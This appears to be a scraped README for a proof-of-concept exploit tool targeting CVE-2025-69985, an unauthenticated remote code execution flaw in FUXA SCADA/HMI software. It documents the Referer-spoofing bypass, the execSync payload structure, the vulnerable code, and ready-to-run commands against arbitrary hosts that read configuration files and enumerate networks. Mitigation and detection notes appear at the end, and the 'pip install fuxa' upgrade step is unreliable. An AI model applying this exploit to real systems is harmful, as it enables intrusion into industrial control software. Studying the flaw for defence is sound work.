Share
## https://sploitus.com/exploit?id=36B09711-9C64-5523-AE62-87CB12AF58B3
# CVE-2025-69985: FUXA โ‰ค 1.2.8 Authentication Bypass + RCE Exploit

[![CVE](https://img.shields.io/badge/CVE-2025--69985-critical)](https://nvd.nist.gov/vuln/detail/CVE-2025-69985)
[![Python](https://img.shields.io/badge/python-3.7%2B-blue)](https://www.python.org/)
[![License](https://img.shields.io/badge/license-GPL--3.0-green)](https://www.gnu.org/licenses/gpl-3.0.en.html)

> **WARNING**: This is a proof-of-concept exploit for **authorized security testing only**. Do not use against systems you do not own or have explicit permission to test.

## Description

**CVE-2025-69985** is a critical authentication bypass vulnerability in [FUXA](https://github.com/frangoteam/FUXA) (open-source web-based SCADA/HMI software) affecting versions โ‰ค 1.2.8.

The vulnerability exists in `server/api/jwt-helper.js` middleware, which improperly trusts the HTTP `Referer` header to validate internal requests. An attacker can bypass JWT authentication by spoofing the `Referer` header, gaining access to the protected `/api/runscript` endpoint to execute arbitrary Node.js code.

### Technical Details

| Attribute | Value |
|-----------|-------|
| **CVE ID** | CVE-2025-69985 |
| **CVSS Score** | 9.8 (Critical) |
| **Affected Versions** | FUXA โ‰ค 1.2.8 |
| **Attack Vector** | Network (unauthenticated) |
| **Impact** | Remote Code Execution (RCE) |
| **Root Cause** | Improper authentication via Referer header trust |
| **Patched Version** | > 1.2.8 |

## Start

### Prerequisites

- Python 3.7+
- `requests` library (`pip install requests`)
- Docker (for vulnerable test environment)

### Installation

```bash
# Clone the repository
git clone https://github.com/ladybugsaga/CVE-2025-69985-FUXA-Exploit.git
cd CVE-2025-69985-FUXA-Exploit

# Install dependencies
pip install requests
```

## Testing the Vulnerability

### Step 1: Deploy Vulnerable Environment

Use Docker to deploy a vulnerable FUXA instance for safe testing:

```bash
# Deploy FUXA v1.2.0 (vulnerable)
docker run -d \
  --name fuxa-vuln \
  -p 1881:1881 \
  frangoteam/fuxa:1.2.0

# Wait for container to initialize
sleep 10

# Verify FUXA is accessible
curl http://localhost:1881/
```

### Step 2: Run the Exploit

```bash
# Basic command execution
python3 exploit.py -u http://localhost:1881 -c "whoami"

# Get system information
python3 exploit.py -u http://localhost:1881 -c "id"
python3 exploit.py -u http://localhost:1881 -c "uname -a"
python3 exploit.py -u http://localhost:1881 -c "cat /etc/os-release"

# List files in working directory
python3 exploit.py -u http://localhost:1881 -c "ls -la"
```

### Expected Output

```
 [*] Target : http://localhost:1881
 [*] Command: whoami

 [*] Preparing payload โ†’ executing: whoami
 [*] Sending exploit request to /api/runscript ...
 [*] Response status: 200
 [+] Command executed successfully (CVE-2025-69985 bypass)!

 === COMMAND OUTPUT ===
 "root"
 ======================

 ================================================================
  Exploit completed!.
 ================================================================
```

## Usage

```bash
python3 exploit.py -u  -c 
```

### Arguments

| Option | Required | Description |
|--------|----------|-------------|
| `-u, --url` | Yes | Target URL (e.g., `http://target:1881`) |
| `-c, --cmd` | Yes | Command to execute on target |

### Examples

```bash
# Single command execution
python3 exploit.py -u http://192.168.1.100:1881 -c "ls -la /"

# Extract FUXA configuration
python3 exploit.py -u http://target:1881 -c "cat /usr/src/app/FUXA/server/_db/projects.json"

# Network enumeration
python3 exploit.py -u http://target:1881 -c "cat /proc/net/arp"
python3 exploit.py -u http://target:1881 -c "ip addr show"
```

##  How It Works

### Attack Flow

```
Attacker โ†’ POST /api/runscript
    โ†“
    Referer: http://target:1881/fuxa  โ† Spoofed header bypasses JWT
    โ†“
    Body: {"script": {"code": "require('child_process').execSync('command')"}}
    โ†“
Server โ†’ Executes Node.js code via child_process.execSync()
    โ†“
Response: Command output returned in HTTP response
```

### Vulnerable Code Path

```javascript
// server/api/jwt-helper.js (vulnerable)
if (req.headers.referer && req.headers.referer.includes(req.headers.host)) {
    // Trusts Referer header as "internal" request
    return next();  // Bypasses JWT validation
}
```

The exploit crafts a multipart request with:
1. **Spoofed `Referer` header** matching the target's host
2. **Malicious JavaScript payload** using `child_process.execSync()`
3. **`/api/runscript` endpoint** which executes the code with server privileges

##  Mitigation

### Upgrade

```bash
# Update to patched version
pip install fuxa>1.2.8
# OR
docker pull frangoteam/fuxa:latest
```

### Workarounds

If immediate patching is not possible:

1. **Network Segmentation**: Restrict FUXA access to internal networks only
2. **Reverse Proxy**: Add authentication layer before FUXA
3. **WAF Rules**: Block requests with suspicious Referer headers to `/api/runscript`

### Detection

Monitor for:
- Unexpected `Referer` headers in API requests
- POST requests to `/api/runscript` endpoint
- Child process execution from Node.js runtime

##  References

- [CVE-2025-69985 - NVD](https://nvd.nist.gov/vuln/detail/CVE-2025-69985)
- [GitHub Advisory GHSA-4r4r-4jp4-wwf9](https://github.com/advisories/GHSA-4r4r-4jp4-wwf9)
- [FUXA Project](https://github.com/frangoteam/FUXA)
- [Exploit-DB 52544](https://www.exploit-db.com/exploits/52544)

##  Disclaimer

This tool is provided for **educational and authorized security testing purposes only**. The author assumes no liability for misuse of this code.

- **DO NOT** use against systems you do not own
- **DO NOT** use without explicit written permission
- **DO NOT** use for malicious purposes

Unauthorized access to computer systems is illegal under:
- Computer Fraud and Abuse Act (CFAA) - USA
- Computer Misuse Act 1990 - UK
- Similar legislation in other jurisdictions

##  License

GNU General Public License v3.0 (GPL-3.0)

Copyright (c) 2026

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

## Credits

- **Original Exploit Author**: Joshua van der Poll ([@joshuavanderpoll](https://github.com/joshuavanderpoll/))
- **Vulnerability Discovery**: FUXA Security Team / Community
- **CVE Assignment**: MITRE Corporation

---

**Repository**: https://github.com/ladybugsaga/CVE-2025-69985-FUXA-Exploit  
**Issues**: https://github.com/ladybugsaga/CVE-2025-69985-FUXA-Exploit/issues